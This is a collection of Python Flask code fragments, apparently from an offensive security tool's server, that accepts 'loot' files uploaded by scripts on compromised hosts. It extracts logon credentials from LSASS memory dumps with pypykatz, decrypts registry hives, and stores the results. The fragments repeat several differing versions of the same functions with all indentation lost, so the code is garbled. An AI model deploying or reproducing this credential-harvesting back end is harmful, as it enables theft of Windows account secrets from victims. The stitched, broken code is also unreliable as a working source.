def upload():
"""Upload one or more files"""
file_list = request.files.getlist("file[]")
is_from_script = "script" in request.args
loot = "loot" in request.args and request.args["loot"]
for file in file_list:
if file.filename == '':
return redirect(request.url)
if file:
if loot:
loot_id = request.args["loot"]
log.info("Loot received - %s" % loot_id)
save_loot(file, loot_id, encrypted=is_from_script)
else:
log.info("File received - %s" % file.filename)
save_file(file, encrypted=is_from_script)
if loot:
decrypt_hive(loot_id)
push_notification("reload", "Update Loot", "")
else:
push_notification("reload", "Update Fileexchange", "")
if is_from_script:
return ('OK', 200)
else:
return redirect('/fileexchange')
def process_file(file, loot_id, is_from_script, remote_addr):
"""Save the file or the loot and return a message for push notification"""
if loot_id:
log.info("Loot received - %s" % loot_id)
try:
save_loot(file, loot_id, encrypted=is_from_script)
decrypt_hive(loot_id)
msg = {
'title':
"Loot received!",
'body':
"%s from %s has been stored." % (
file.filename,
remote_addr,
),
'category':
"success",
}
except Exception as e:
msg = {
'title': "Error while processing loot",
'body': str(e),
'category': "danger",
}
log.exception(e)
else:
log.info("File received - %s" % file.filename)
save_file(file, encrypted=is_from_script)
msg = {}
return msg
def upload():
"""Upload one or more files"""
file_list = request.files.getlist("file[]")
for file in file_list:
if file.filename == '':
return redirect(request.url)
if file:
save_file(file)
return redirect('/fileexchange')
def upload():
"""Upload one or more files"""
file_list = request.files.getlist("file[]")
noredirect = "noredirect" in request.args
for file in file_list:
if file.filename == '':
return redirect(request.url)
if file:
save_file(file)
push_notification("reload", "Update Fileexchange", "")
if noredirect:
return ('OK', 200)
else:
return redirect('/fileexchange')
def save_loot(file, loot_id, encrypted=False):
"""Process the loot file"""
filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
loot_type = get_loot_type(filename)
log.debug("Saving %s [%s]" % (filename, loot_type))
if loot_type == "DMP":
from pypykatz.pypykatz import pypykatz
mimi = pypykatz.parse_minidump_file(filename)
creds = [json.loads(v.to_json())
for _, v in mimi.logon_sessions.items()]
store_minidump(loot_id, json.dumps(creds), filename)
elif loot_type == "SYSINFO":
add_sysinfo(loot_id, filename)
else: # registry hive
add_hive(loot_id, loot_type, filename)
def save_loot(file, loot_id, encrypted=False):
"""Process the loot file"""
filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
loot_type = get_loot_type(filename)
try:
if loot_type == "DMP":
from pypykatz.pypykatz import pypykatz
mimi = pypykatz.parse_minidump_file(filename)
creds = [
json.loads(v.to_json())
for _, v in mimi.logon_sessions.items()
]
store_minidump(loot_id, json.dumps(creds), filename)
elif loot_type == "SYSINFO":
add_sysinfo(loot_id, filename)
else: # registry hive
add_hive(loot_id, loot_type, filename)
except ImportError as e:
log.error("You have unmet dependencies, loot could not be processed")
log.exception(e)
